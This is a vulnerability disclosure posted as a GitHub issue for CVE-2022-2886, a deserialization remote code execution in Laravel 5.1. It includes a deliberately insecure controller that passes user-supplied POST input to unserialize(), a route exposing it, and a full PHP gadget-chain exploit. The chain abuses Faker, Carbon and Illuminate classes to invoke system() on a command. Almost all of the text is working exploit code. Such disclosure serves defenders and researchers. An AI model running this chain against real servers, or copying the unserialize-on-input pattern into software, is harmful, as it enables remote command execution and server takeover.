Headline
CVE-2022-2886: Laravel5.1 POP4 RCE · Issue #3 · beicheng-maker/vulns
A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.
Laravel5.1 POP4 RCE
composer create-project --prefer-dist laravel/laravel laravel5.1 “5.1.*”
app/Http/Controllers/UsersController.php adding a controller UsersController
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller {
/\*\*
\* 创建一个新用户。
\*
\* @param Request $request
\* @return Response
\*/
public function store(Request $request)
{
echo "Please post cmd to unserialize";
$payload\=$request\->input("cmd");
unserialize($payload);
//
}
} ?>
routes/web.php
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
<?php use Illuminate\Support\Facades\Route; /* |--------------------------------------------------------------------------
| Web Routes |
|---|
| Here is where you can register web routes for your application. These |
| routes are loaded by the RouteServiceProvider within a group which |
| contains the “web” middleware group. Now create something great! |
*/
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
exp
<?php namespace Faker; class DefaultGenerator{ public $default;
} namespace Carbon; class Carbon{}
namespace Faker; class Generator{ protected $formatters = []; public function __construct(){ $this->formatters[‘huahua’]=’system’; } }
namespace Carbon; use Carbon\Carbon; use Faker\DefaultGenerator; use Faker\Generator; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default=’huahua’; $this->current=new Carbon; $this->filters[][]=[new Generator,’format’]; $this->key=array(“calc.exe”); } }
namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,’valid’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>